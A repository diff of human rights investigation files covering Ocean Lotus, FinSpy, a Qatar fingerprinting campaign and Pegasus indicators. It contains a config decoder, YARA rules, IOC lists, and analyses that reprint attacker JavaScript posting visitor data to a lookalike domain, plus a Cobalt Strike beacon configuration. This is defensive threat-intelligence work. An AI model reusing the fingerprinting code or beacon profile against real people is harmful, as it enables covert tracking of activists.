self.b.seek(-n, os.SEEK_CUR)
def read(self, a0, a1= None):
r = None
if a1 is None:
r = self.b.read(a0)
else:
r = self.read_at(a0,a1)
return r
def read_at(self, off, n):
old_l = self.b.tell()
self.b.seek(off, os.SEEK_SET)
r = self.b.read(n)
self.b.seek(old_l, os.SEEK_SET)
return r
def __len__(self):
return self._len
def __getattr__(self, name):
at = False
if name.endswith('_at'):
name = name[:-3]
if name in M.TRANSL:
f, s = M.TRANSL[name]
return lambda off = None: self._get_bytes(f, s, off)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Decode FinSpy configuration files')
parser.add_argument('CONFFILE', help='Configuration file')
args = parser.parse_args()
with open(args.CONFFILE, 'rb') as f:
d = f.read()
m = M(d)
total_size = m.dword()
if total_size != len(d):
print("Encrypted configuration, decrypting...")
k = (0xaa, 0x5a, 0xa5)
r = bytearray()
for i, c in enumerate(bytearray(d)):
r.append(c ^ k[i % 3])
data = bytes(r)
m = M(data)
total_size = m.dword()
_ = m.dword() ## doesn't matter but config is wrapped into TlvTypeEncryption
cfg = decode(m)
print(json.dumps(cfg, cls=MyEncoder, indent=4))

View File

@@ -0,0 +1,13 @@
sha256,Description
1e9162cd0941557304a6a097dfaadf59f90bc8bbaa9879afe67b5ce0d1514be8,Linux FinSpy sample
854774a198db490a1ae9f06d5da5fe6a1f683bf3d7186e56776516f982d41ad3,Android FinSpy sample
bb8c0e477512adab1db26eb77fe10dadbc5dcbf8e94569061c7199ca4626a420,Backdoored rar installer
80d6e71c54fb3d4a904637e4d56e108a8255036cbb4760493b142889e47b951f,MacOS Installer
f960144126748b971386731d35e41288336ad72a9da0c6b942287f397d57c600,Backdoored flash installer
fab6b3bbc14c80049f95b040680fba6d1b47f07746729d04c887a55272084648,Encoded cobalt strike beacon
8f216d2f0be2c4a5c07abf45cf138453f72f00ec598327756c6fc9d5f4dabe0d,Decoded Cobalt Strike beacon
4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea,Older Mac OS sample
bd1b8bc046dbf19f8c9bbf9398fdbc47c777e1d9e6d9ff1787ada05ed75c1b12,Older Linux sample
9f04439bc94f2eef76b72ac2e0aeece0d4f46b6c42ef179fc860f6b5876f5f50,Android FinSpy sample
928aefbcac9386c953b3491230a719ff65b21612eb6bd9b32501de149cacbc92,Android FinSpy sample
14658327efaa15275fb8718956ee97ebcad5bc80312a4f3182a3b10cd3dcf257,NilePhish downloader
1 sha256 Description
2 1e9162cd0941557304a6a097dfaadf59f90bc8bbaa9879afe67b5ce0d1514be8 Linux FinSpy sample
3 854774a198db490a1ae9f06d5da5fe6a1f683bf3d7186e56776516f982d41ad3 Android FinSpy sample
4 bb8c0e477512adab1db26eb77fe10dadbc5dcbf8e94569061c7199ca4626a420 Backdoored rar installer
5 80d6e71c54fb3d4a904637e4d56e108a8255036cbb4760493b142889e47b951f MacOS Installer
6 f960144126748b971386731d35e41288336ad72a9da0c6b942287f397d57c600 Backdoored flash installer
7 fab6b3bbc14c80049f95b040680fba6d1b47f07746729d04c887a55272084648 Encoded cobalt strike beacon
8 8f216d2f0be2c4a5c07abf45cf138453f72f00ec598327756c6fc9d5f4dabe0d Decoded Cobalt Strike beacon
9 4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea Older Mac OS sample
10 bd1b8bc046dbf19f8c9bbf9398fdbc47c777e1d9e6d9ff1787ada05ed75c1b12 Older Linux sample
11 9f04439bc94f2eef76b72ac2e0aeece0d4f46b6c42ef179fc860f6b5876f5f50 Android FinSpy sample
12 928aefbcac9386c953b3491230a719ff65b21612eb6bd9b32501de149cacbc92 Android FinSpy sample
13 14658327efaa15275fb8718956ee97ebcad5bc80312a4f3182a3b10cd3dcf257 NilePhish downloader

View File

@@ -0,0 +1,157 @@
# Overview of Ocean Lotus Samples used to target Vietnamese Human Rights Defenders
From May to November 2020, we have identified malware attacks targeting Human Rights Defenders and organizations from Viet Nam. This technical blog post provides an overview of the different Ocean Lotus samples identified, technical indicators, and details on the link with earlier Ocean Lotus activities. For more information on the context of these attacks and the targets we identified, please read the report entitled [“Click and Bait: Vietnamese Human Rights Defenders Targeted with Spyware Attacks”](https://www.amnesty.org/en/latest/research/2021/02/click-and-bait-vietnamese-human-rights-defenders-targeted-with-spyware-attacks/) on the Amnesty website (also available in Vietnamese).
We found 9 different malware samples in this investigation: 4 for Mac OS, and 5 for Microsoft Windows.
## Mac OS Malware
### First appearance in 2018
The first Mac OS sample we identified targeted Bui Thanh Hieu in February 2018. Attackers delivered a malicious Mac OS application named _“PHIẾU GHI DANH THAM DỰ TĨNH HỘI HMDC 2018”_ attached to an email. This sample belongs to the same family as the Ocean Lotus samples analysed by [Trend Micro in 2018](https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html), and they even share the same string encryption algorithm and key.
The malicious application uses a first stage dropper to bypass Apple GateKeeper, then it installs the final payload either in `/Library/CoreMediaIO/Plug-Ins/FCP-DAL/iOSScreenCapture.plugin/Contents/Resources/screenassistantd`, if it is launched with root access, otherwise in `~/Library/Spelling/spellagentd`. The malware gains persistence with a Property List file placed in `~/Library/LaunchAgents/`.
The final payload communicates with the same domains mentioned in the Trend Micro report: `ssl.arkouthrie.com`, `s3.hiahornber.com` and `widget.shoreoa.com`.
### New variants from 2019
In 2019 Bui Thanh Hieu received three more malicious emails with links to or attached malicious Mac OS applications, which are more recent variants of the same malware we described above. However, these variants seem less developed than the samples analysed by [Trend Micro in November 2020](https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html), making them likely intermediate versions between those discovered by Trend Micro in 2018 and in 2020.
When executed, these applications launch an installer either embedded in the package or decrypted by a dedicated Python script. The installer disables security protections by removing the _com.apple.quarantine_ bit, launches the final payload and configures persistence by creating a property list in the LaunchAgent user folder, or in the _/Library/LaunchDaemons/_ folder if launched as root.
![](img/1.png)
The installer drops two files in the destination folder: one Mach-O binary payload and an encrypted shared Mach-O library named `[INTEGER].3gp` (such as 33.3gp or 152.3gp). To avoid their discovery during forensic analysis, these files creation date and time are faked with the command `touch t`.
The payload first gathers information on the system, including the MacOS version, the kernel version and details on the hardware and CPU. Then it tries to decrypt all the files in the folder until it finds a shared library exporting the functions `ArchaeologistCodeine` and `PlayerAberadurtheIncomprehensible`. This shared library implements the communication with one of three configured Command & Control (C&C) domains, using libcurl to send POST HTTP requests with an encrypted body.
This malware uses custom base64 and AES algorithms to obfuscate all the strings, making it harder to analyse or build signatures as the encryption keys are changing regularly. In comparison, the 2018 variant used a custom base64 but standard AES, while more recent samples analysed by Trend Micro in 2020 abandoned AES in favour of a custom byte manipulation algorithm.
This backdoor has limited purpose. It allows to manipulate files and execute commands in a terminal. For the full list of supported commands, check [Trend Micros report](https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html).
## Windows Backdoors
We identified five emails in 2019 and 2020 each containing two files compressed in RAR or ISO archives. The first file is a legitimate copy of Microsoft Word 2007s executable used for DLL side-loading, while the second is a DLL named wwlib.dll loaded at launch by the Word executable it accompanies.
DLL side-loading is a technique observed [several times](https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/) used by Ocean Lotus, typically with a Microsoft Word executable. The final payload is always a variant of a downloader used exclusively by Ocean Lotus and [named Kerrdown](https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/) by the cybersecurity company Palo Alto. All the Kerrdown samples we analysed delivered a Cobalt Strike payload.
### Kerrdown analysis
Kerrdown is a dropper that uses several layers of shellcode to obfuscate the final payload. Each one of them decrypting and redirecting to the next layer, until the final payload is reached.
For instance, the first Kerrdown sample we found in May 2019 used 4 distinct stages before executing the final shellcode that downloads a payload from `api.ciscofreak.com/HjRX` (the domain was down during our investigation, but [this Cobalt Strike beacon](https://www.virustotal.com/gui/file/1cc3f2296f5cd9207f6c84fa9de26dcdbff0b16e49accb0f8dd670ee8d32dd50/detection) uploaded on Virus Total in 2019 communicates with this domain)
![](img/2.png)
These layers of shellcode are different for each Kerrdown sample we discovered, making it challenging to build signatures for this malware family.
One of the samples which targeted the Vietnamese blogger in July 2020 introduced an additional step in the execution. The _wwwlib.dll_ payload installs a binary in `C:\ProgramData\Java\UK.exe`, a self-extractable RAR archive containing a legitimate executable copy of the Opera browser, then used to sideload a malicious DLL called _opera.dll_.
This opera.dll is another variant of the Kerrdown family, but the file itself is exceptionally large (42MB). Expanding payloads with junk data is [a technique](https://attack.mitre.org/techniques/T1027/001/), called “binary padding”, often used by malware to avoid detection by security solutions as some do not analyse large files in depth to avoid performance issues. Binary padding is known to have been used by Ocean Lotus [in the past](https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/). This Kerrdown sample includes an obfuscated Cobalt Strike beacon communicating with the domain `delicalo.dnsalias.net`.
![](img/3.png)
### Cobalt Strike
Cobalt Strike is an intrusion toolkit sold by the US company [Strategic Cyber LLC](Strategic Cyber LLC) for penetration testing or adversary simulation. Over the past years, cracked versions of Cobalt Strike have been regularly used by attack groups in their operations. [Cobalt Strike allows](https://www.cobaltstrike.com/features) to remotely monitor a compromised system, including accessing files but also logging keystrokes or taking screenshots.
Ocean Lotus has been known for using Cobalt Strike since [at least 2017](https://www.cybereason.com/blog/operation-cobalt-kitty-apt). The 4 Kerrdown samples we identified all either embedded or downloaded a Cobalt Strike beacon. They all used a Cobalt Strike profile impersonating Google Safe Browsing services URLs, similar to [this public profile](https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile).
The configuration can be easily extracted with the [scripts we released in September 2020](https://github.com/AmnestyTech/investigations/tree/master/2020-09-25_finfisher/scripts/cobaltstrike). Here is an example of configuration for a beacon hosted on `delicalo.dnsalias.net`:
```
dns False
ssl True
port 443
.sleeptime 4100
.http-get.server.output
.jitter 12
.maxdns 245
publickey 30819f300d06092a864886f70d010101050003818d0030818902818100ac50b035fd1b294778b8cbd4ee33323f9b04af158cca225d099052d7987441cbb365ab0f81c4c1190cd8758324e1cb7085dac65ce264dc510c57cfa1d1c7711f26c767d574f04ac16d20a0acf91d4e5dc1cc62c764676b0c38ba50d43953df5184468efdd6b4098c12b5c94be562de22881484accf8e69473621efa95e290f19020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
.http-get.uri delicalo.dnsalias[.]net,/safebrowsing/rd/e3Iz4FnySnhy3IuXKqrWM40JnseSLDHcH-OzVVfWmVgwx
.user-agent Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
.http-post.uri /safebrowsing/rd/3KHLhJGZRq4iyImdpSZ5RM90vLo3Yt2hB
.http-get.client
GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflaPREF=ID=Cookie
.http-post.client
GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflatU=NoncmvrScxBxlwoPREF=ID=Cookie
.post-ex.spawnto_x86 %windir%\syswow64\rundll32.exe
.post-ex.spawnto_x64 %windir%\sysnative\rundll32.exe
.pipename
.cryptoscheme 1
.dns_idle 0
.dns_sleep 0
.http-get.verb GET
.http-post.verb POST
shouldChunkPosts 0
.watermark 0
.stage.cleanup 0
CFGCaution 0
.proxy_type 2
killdate 0
text_section 0
process-inject-start-rwx 64
process-inject-use-rwx 64
process-inject-min_alloc 0
process-inject-transform-x86
process-inject-transform-x64
```
## Indicators of Compromise
### Mac OS samples
| Feb 2018 | |
| ------------- |-------------|
| Package name | PHIẾU GHI DANH THAM DỰ TĨNH HỘI HMDC 2018 |
| Dropper | 952c16674bde3c16aa3935b3e01f3f0fb4cbac7ffa130143cbf6ccaa72733068 |
| Payload | d3a198e18f8c5e9ed54ed4959b471a0f15fbda7d4abf92b7726bc07723e46dd5 |
| C&C | `ssl.arkouthrie.com` `widget.shoreoa.com` `s3.hiahornber.com` |
| **June 2019** | |
| Package name | TaiLieu |
| Dropper | ecb6186a5e722fa360ece37191589305858a0e176321c9339831f2884dcb0405 |
| Payload | 1599fe6cc77764c17802cfde1ca77f091bb3ec2a49f6cab1c80ee667ea7c752b |
| Network library | b8567ce4d0595e6466414999798bcb1dfe01cc5ca1dd058bfc55f92033f0f3d8 |
| C&C | `tips.jasperpfeiffer.com` `land.rellecharlessper.com` and `art.guillermoespana.com` |
| **October 2019** | |
| Package Name | Danh sach nhan su |
| Dropper | b252a8d2ec5c7080286fe3f0ad193062f506b5c34c4c797f97717e396c0a22d5 |
| Payload | 9c14cffd79f863fec0a6c0ed337ea82a9044db09afda53b8ac2aef1d49f74f4f |
| Network Library | 5ed6b7b450ead2d0e69faa3069d1e0bd3a6852909092235f75087da0ca05462f |
| C&C | `tips.jasperpfeiffer.com` `land.rellecharlessper.com` and `art.guillermoespana.com` |
| **December 2019** | |
| Package Name | Don keu cuu cua gia dinh Le Nam Tra |
| Dropper | a890c88b6c64371242b4047830b9189b4546536c6b11576d0738f0ba1840ade |
| Payload | 0c41358adeea24d80b35bac4b4f60d93711e32e287343cb604e1fa79b5e5e465 |
| Network Library | 5ed6b7b450ead2d0e69faa3069d1e0bd3a6852909092235f75087da0ca05462f |
| C&C | `tips.jasperpfeiffer.com` `land.rellecharlessper.com` and `art.guillermoespana.com` |
### Windows Samples
| June 2019 | |
|-----------|--|
| Winword.exe (legitimate) | 6c959cfb001fbb900958441dfd8b262fb33e052342948bab338775d3e83ef7f7 |
| wwlib.dll | 148e647885712b69258967c5f8798966fb9b8ae24847dda8aeb880cb6f56b6da |
| C&C | `api.ciscofreak.com` |
| **April 2020** | |
| Winword.exe (legitimate) | 6c959cfb001fbb900958441dfd8b262fb33e052342948bab338775d3e83ef7f7 |
| wwlib.dll | acb33adf7429424170f63fa5490ed580cf502de4a7ef00e4b8c962425cd85052 |
| C&C | `node.podzone.org` |
| **July 2020** | |
| Winword.exe (legitimate) | 6c959cfb001fbb900958441dfd8b262fb33e052342948bab338775d3e83ef7f7 |
| wwlib.dll | 5cc8d52fcabfd35042336e095f1f78c2b2884e7826358f5385729cf45ce4d860 |
| Opera.exe (legitimate) | 71c3b9538a0f14a8ab67e579ecc4ce2b01e25507d8c07eaf46555e8f44181e37 |
| Opera.dll | a51fb048e5a2730bffd0fd43e3bdda4e931c9358254aff960ddf43526c768120 |
| C&C | `delicalo.dnsalias.net` |
| **November 2020 (2 emails)** | |
| Winword.exe (legitimate) | 6c959cfb001fbb900958441dfd8b262fb33e052342948bab338775d3e83ef7f7 |
| wwlib.dll | a574720e7b4f420098a0ac0055089000435439eb61ec6de2077ac0f782a506e9 |
| C&C | `coco.cechire.com` |
You can find the full list of indicators of compromise [here](https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam/indicators).

Binary file not shown.

After

Width:  |  Height:  |  Size: 62 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 71 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 60 KiB

View File

@@ -0,0 +1,9 @@
# Indicators of Compromise
Indicators of compromise of the report [Click and Bait: Vietnamese Human Rights Defenders Targeted with Spyware Attacks ](https://www.amnesty.org/en/latest/research/2021/02/click-and-bait-vietnamese-human-rights-defenders-targeted-with-spyware-attacks/)
Files:
* `domains.txt`: list of domains
* `ips.txt`: list of IP addresses
* `rules.yar`: YARA rules
* `sha256.txt`: SHA256 of samples

View File

@@ -0,0 +1,10 @@
ssl.arkouthrie.com
widget.shoreoa.com
s3.hiahornber.com
tips.jasperpfeiffer.com
land.rellecharlessper.com
art.guillermoespana.com
api.ciscofreak.com
node.podzone.org
delicalo.dnsalias.net
coco.cechire.com

View File

@@ -0,0 +1,6 @@
185.174.101.13
185.157.79.134
95.168.191.35
45.76.106.146
5.149.254.19
103.114.161.122

View File

@@ -0,0 +1,62 @@
rule apt32_macos_dropper {
meta:
author = "Amnesty Tech"
strings:
$s1 = "setStartup" ascii
$s2 = "getSizeDataLoader" ascii
$s3 = "GET_LAUNCHNAME" ascii
$s4 = "GET_PROCESSNAME" ascii
$s5 = "getProcessnameRoot" ascii
$s6 = "getProcessnameUser" ascii
$s7 = "getProcessPathRoot" ascii
$s8 = "getLabelnameRoot" ascii
$s9 = "getLabelnameUser" ascii
$s10 = "stringFromHex" ascii
$s11 = "_b64_decode_ex" ascii
condition:
(uint16(0) == 0xfacf or uint16(0) == 0xface) and 9 of them
}
rule apt32_macos_backdoor_2018_encryption_key {
strings:
$key = { 63 49 2f 6e 22 00 10 fe 33 4f 2f c5 05 b2 11 03 ba 5b dd 02 }
$ccc = "CCCrypt" ascii
condition:
(uint16(0) == 0xfacf or uint16(0) == 0xface) and all of them
}
rule apt32_macos_backdoor_2019_encryption_key {
meta:
report = "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/"
strings:
$key1 = { 9D 72 74 AD 7B CE F0 DE D2 9B DB B4 28 C2 51 DF 8B 35 0B 92 }
$key2 = {2c e4 25 29 5e 2a 20 40 9c a5 13 1e 61 1e 51 6f 2c b7 a7 7f }
$key3 = { 8b b2 c4 67 56 5c 63 42 8e f0 cf c5 f4 8d 87 ae 58 0c 5b a4 }
$ccc = "CCCrypt" ascii
condition:
(uint16(0) == 0xfacf or uint16(0) == 0xface) and $ccc and any of ($key*)
}
rule apt32_macos_backdoor_2018 {
meta:
author = "Amnesty Tech"
strings:
$s1 = "respondDownloadThreadP" ascii
$s2 = "checkProcessExist" ascii
$s3 = "setFristRandom" ascii
$s4 = "getInstalledTime" ascii
$s5 = "getSerialNumber" ascii
$s6 = "appendPathComponent" ascii
$s7 = "initFirstRandom" ascii
$s8 = "CFURLToString" ascii
$s9 = "GET_DOMAIN_CLIENT_INFO" ascii
$s10 = "getFirstRandom_Header" ascii
$s11 = "respondLoadLunaThread" ascii
condition:
(uint16(0) == 0xfacf or uint16(0) == 0xface) and 9 of them
}

View File

@@ -0,0 +1,15 @@
952c16674bde3c16aa3935b3e01f3f0fb4cbac7ffa130143cbf6ccaa72733068
d3a198e18f8c5e9ed54ed4959b471a0f15fbda7d4abf92b7726bc07723e46dd5
ecb6186a5e722fa360ece37191589305858a0e176321c9339831f2884dcb0405
1599fe6cc77764c17802cfde1ca77f091bb3ec2a49f6cab1c80ee667ea7c752b
b8567ce4d0595e6466414999798bcb1dfe01cc5ca1dd058bfc55f92033f0f3d8
b252a8d2ec5c7080286fe3f0ad193062f506b5c34c4c797f97717e396c0a22d5
9c14cffd79f863fec0a6c0ed337ea82a9044db09afda53b8ac2aef1d49f74f4f
5ed6b7b450ead2d0e69faa3069d1e0bd3a6852909092235f75087da0ca05462f
a890c88b6c64371242b4047830b9189b4546536c6b11576d0738f0ba1840aded
0c41358adeea24d80b35bac4b4f60d93711e32e287343cb604e1fa79b5e5e465
5ed6b7b450ead2d0e69faa3069d1e0bd3a6852909092235f75087da0ca05462f
148e647885712b69258967c5f8798966fb9b8ae24847dda8aeb880cb6f56b6da
acb33adf7429424170f63fa5490ed580cf502de4a7ef00e4b8c962425cd85052
5cc8d52fcabfd35042336e095f1f78c2b2884e7826358f5385729cf45ce4d860
a574720e7b4f420098a0ac0055089000435439eb61ec6de2077ac0f782a506e9

View File

@@ -0,0 +1,72 @@
# Fingerprinting Campaign Targeting Malcolm Bidali
On the 4th of May 2021, Qatars state security services forcibly disappeared the Kenyan labour rights activist Malcolm Bidali. Migrant-Rights.org, FairSquare, Amnesty International, Human Rights Watch, and the Business & Human Rights Resource Centre [are calling on Qatari authorities to immediately reveal his whereabouts and explain why he has been detained](https://www.amnesty.org/en/latest/news/2021/05/activist-malcolm-bidali-in-solitary-confinement-in-qatar/). If he has been detained for his activism he should be released immediately and unconditionally.
Malcolm Bidali, 29, is a security guard in Qatar, blogger and activist, who has been vocal about the plight of migrant workers like himself, and has written using a pseudonym Noah for a number of online platforms.
A few days before his disappearance, someone replied to a tweet from Malcolm's Twitter account [@NoahArticulates](https://twitter.com/noaharticulates) with a link to what appeared to be a Human Rights Watch video. This link has been used in an attempt to gather technical information which may have contributed to his identification or geolocation. Amnesty International's Security Lab identified two more domains related to this campaign which may have been used in the same way.
## Initial Tweet
On the 26th of April, the Twitter account @MukhbatQatar replied to @NoahArticulates with a tweet that included a link to a domain mimicking YouTube: `https://youl[.]tube/watch?v=Gt4tqJLiOT0&t=s17`
![](tweet.png)
The link shared with Malcolm Bidal loads a YouTube video by Human Rights Watch about labor rights in Qatar.
![](youltube.png)
Logs from Malcolms visit to this decoy page might have allowed the attackers to obtain his IP address, which could have been used to identify and locate him.
## More Domains
While investigating this link, Amnesty International's Security Lab has identified two additional domains related to this campaign.
The same Twitter account @MukhbatQatar has shared a link to the domain `https://twittre[.]co/`with another Twitter user. Using the following JavaScript code (as seen on May 21st), this website collected information about a visitor before redirecting to a legitimate tweet:
```js
$.post('https://twittre[.]co/googleanalytics.js', {
action: "[REDACTED]",
widthScreen: $(window).width(),
heightScreen: $(window).height(),
TimeUser: parseInt((new Date().getTime() / 1000).toFixed(0)),
TimeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
success:function(response){
window.location.href = "https://twitter.com/[REDACTED]";
},
}, function (data) {
});
```
This code sends the screen size, system time and timezone to another page likely recording visits, probably along with the IP address.
A second domain with a similar infrastructure, `twitt-er[.]app`, uses the exact same code:
```js
$.post('https://twitt-er[.]app/statistics', {
action: 'm',
widthScreen: $(window).width(),
heightScreen: $(window).height(),
TimeUser: parseInt((new Date().getTime() / 1000).toFixed(0)),
TimeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
}, function (data) {
window.location.href = 'https://twitter.com/[REDACTED]';
});
```
We have not seen this last domain actively distributed, but we noticed URIs redirect to tweets from other Qatari citizens.
All three of these domains were registered between March and May 2021 using the Njalla registration service, and hosted on separate Digital Ocean servers.
## Indicators of compromise
Here are the domains and IP addresses used in this campaign:
```
youl[.]tube
twittre[.]co
twitt-er[.]app
138.197.103.227
128.199.212.166
161.35.100.139
```

View File

@@ -0,0 +1,3 @@
youl.tube
twittre.co
twitt-er.app

View File

@@ -0,0 +1,3 @@
138.197.103.227
128.199.212.166
161.35.100.139

Binary file not shown.

After

Width:  |  Height:  |  Size: 261 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 MiB

View File

@@ -0,0 +1,16 @@
# NSO Group Pegasus Indicator of Compromise
This repository contains network and device indicators of compromised related to NSO Group's Pegasus spyware. These indicators are a result of multiple investigations by the Amnesty International Security Lab and other partners. Additional technical information was collected as part of a collaborative investigation, the Pegasus Project coordinated by [Forbidden Stories](https://forbiddenstories.org/) and involving a global network of investigative journalists.
Amnesty International has released a [Technical Methodology report](https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/) which outlines how to use these indicators to hunt for Pegasus and other mobile spyware products. The Amnesty International Security Lab is also releasing an open-source tool, the [Mobile Verification Toolkit (MVT)](https://github.com/mvt-project/mvt). MVT can be used with the the pegasus.stix2 indicators to check a devices for potential signs of compromise with Pegasus spyware.
These indicators include:
* `domains.txt`: list of all Pegasus-related domains, with sub-files:
* `v2_domains.txt`: list of Pegasus Version 2 infrastructure. These domains were identifed and published previously by Citizen Lab
* `v3_domains.txt`: list of Pegasus Version 3 infrastructure
* `v4_domains.txt`: list of Pegasus Version 4 infrastructure
* `v4_validation_domains.txt`: list of Pegasus Version 4 validation/URL shortener domains
* `emails.txt`: list of iCloud accounts used for exploiting zero-click vulnerabilities in iMessage and other Apple apps
* `files.txt`: list of suspicious files
* `pegasus.stix2`: [STIX v2](https://oasis-open.github.io/cti-documentation/stix/intro.html) file containing IOCs that can be used with MVT
* `processes.txt`: list of Pegasus-related process names identified on compromised phones

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,29 @@
ameliehaggart@gmail.com
arvidamelia1@gmail.com
bakkere268@gmail.com
bekkerfredi@gmail.com
benjiburns8@gmail.com
bergers.o79@gmail.com
bogaardlisa803@gmail.com
emmadavies8266@gmail.com
emmaholm575@gmail.com
filip.bl82@gmail.com
herbruud2@gmail.com
jessicadavies1345@outlook.com
kleinleon1987@gmail.com
krystynajasinska86@gmail.com
k.williams.enny74@gmail.com
lee.85.holland@gmail.com
linakeller2203@gmail.com
martin.vdm78@gmail.com
meliastahl@gmail.com
mitchkremer14@outlook.com
naomiwerff772@gmail.com
oskarschalcher@outlook.com
smithsonrobert080@gmail.com
sylianosliatsos84@gmail.com
taylorjade0303@gmail.com
vincent.dahl76@gmail.com
weertlaura1@outlook.com
yvonne.wechsler61@gmail.com
natalymarinova@proton.me

View File

@@ -0,0 +1 @@
roleaccountd.plist

View File

@@ -0,0 +1,48 @@
import sys
import os
from stix2.v21 import (Indicator, Malware, Relationship, Bundle, DomainName)
if __name__ == "__main__":
if os.path.isfile("pegasus.stix2"):
os.remove("pegasus.stix2")
with open("domains.txt") as f:
domains = list(set([a.strip() for a in f.read().split()]))
with open("files.txt") as f:
filenames = list(set([a.strip() for a in f.read().split()]))
with open("processes.txt") as f:
processes = list(set([a.strip() for a in f.read().split()]))
with open("emails.txt") as f:
emails = list(set([a.strip() for a in f.read().split()]))
res = []
malware = Malware(name="Pegasus", is_family=False, description="IOCs for Pegasus")
res.append(malware)
for d in domains:
i = Indicator(indicator_types=["malicious-activity"], pattern="[domain-name:value='{}']".format(d), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for p in processes:
i = Indicator(indicator_types=["malicious-activity"], pattern="[process:name='{}']".format(p), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for f in filenames:
i = Indicator(indicator_types=["malicious-activity"], pattern="[file:name='{}']".format(f), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for e in emails:
i = Indicator(indicator_types=["malicious-activity"], pattern="[email-addr:value='{}']".format(e), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
bundle = Bundle(objects=res)
with open("pegasus.stix2", "w+") as f:
f.write(str(bundle))
print("pegasus.stix2 file created")

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,81 @@
ABSCarryLog
accountpfd
actmanaged
aggregatenotd
appccntd
bfrgbd
bh
bluetoothfs
boardframed
brstaged
brfstagingd
bundpwrd
cfprefssd
ckeblld
ckkeyrollfd
com.apple.Mappit.SnapshotService
com.apple.rapports.events
CommsCenterRootHelper
comnetd
comsercvd
confinstalld
contextstoremgrd
corecomnetd
ctrlfs
dhcp4d
Diagnostic-2543
Diagnosticd
Diagnostics-2543
eventfssd
eventsfssd
eventstorpd
faskeepd
fdlibframed
fmld
frtipd
fservernetd
gatekeeperd
GoldenGate
gssdp
JarvisPluginMgr
jlmvskrd
launchafd
launchrexd
libbmanaged
libtouchregd
llmdwatchd
lobbrogd
locserviced
logseld
misbrigd
mobileargd
MobileSMSd
mptbd
msgacntd
natgd
neagentd
nehelprd
netservcomd
otpgrefd
passsd
payload
pcsd
PDPDialogs
pstid
ReminderIntentsUIExtension
rlaccountd
roleaboutd
roleaccountd
rolexd
seraccountd
setframed
smmsgingd
stagegrad
stagingd
vm_stats
keybrd
xpccfd
fnotifyd
tisppd
updaterd
wifip2ppd

View File

@@ -0,0 +1,96 @@
aalaan.tv
accounts.mx
add-client.com
adjust-local-settings.com
adjustlocalsettings.net
alawaeltech.com
alljazeera.co
appsgratis.com.mx
appsjuegos.com.mx
asrararabiya.co
asrararablya.com
asrarrarabiya.com
bahrainsms.co
banca-movil.com
bbc-africa.com
bestday-sales.com
blackberry.org.mx
bulbazaur.com
bulksender.info
bytlo.com
cell-mcel.info
checkinonlinehere.com
chistedeldia.mx
clubmovistar.com
cnn-africa.co
damanhealth.online
ecommerce-ads.org
emiratesfoundation.net
erty.online
facebook-accounts.com.mx
fb-accounts.com
fbsecurity.co
findgroupon.com
gdfr.online
googleplay-store.com
icloudcacher.com
icrcworld.com
ideas-telcel.com.mx
instangram.com.mx
iusacell-movil.com.mx
kaidee.info
kenyasms.org
khaleejtimes.online
kra.center
manoraonline.net
mcel.info
mcel-update.com
megaticket.info
moz-noticias.com
mozsafety.com
mymensaje-sms.com
mz-vodacom.info
nation-news.com
network190.com
newtarrifs.net
nsoqa.com
ooredoodeals.com
pickuchu.com
pine-sales.com
qaintqa.com
qaoffers.net
redcrossworld.com
remove-client.com
remove-from-mailing-list.com
remove-from-mailinglist.com
remove-subscription.com
sabafon.info
secure-access10.mx
sms-center.info
smscentro.com
smser.net
smsmensaje.mx
sms-sending.net
sms-zone.org
thainews.asia
ticket-selections.com
topcontactco.com
track-your-fedex-package.com
trackyourfedexpackage.net
track-your-fedex-package.org
turkeynewsupdates.com
turkishairines.info
twiitter.com.mx
twiitter.com.mx
uaenews.online
univision.click
unlockaccount.net
unonoticias.net
unsubscribeinhere.com
updatedchargers.com
updatedcharges.net
vamizi.info
webadv.co
whatsapp-app.com
whatsappsupport.net
y0utube.com.mx

View File

@@ -0,0 +1,610 @@
14-tracking.com
1minto-start.com
24-7clinic.com
3driving.com
456h612i458g.com
7style.org
800health.net
911hig11carcay959454.com
accountnotify.com
activate-discount.com
actorsshop.net
actu24.online
addmyid.net
adeal4u.co
afriquenouvelle.com
aircraftsxhibition.com
ajelnews.net
akhbara-aalawsat.com
akhbar-aliqtisad.com
akhbar-arabia.com
albumphotopro.biz
alive2plunge.com
allafricaninfo.com
allbeautifularts.com
alldaycooking.co
allfadiha.co
allladiesloveme.com
all-sales.info
allthecolorsyoulike.com
allthegamesyouneed.com
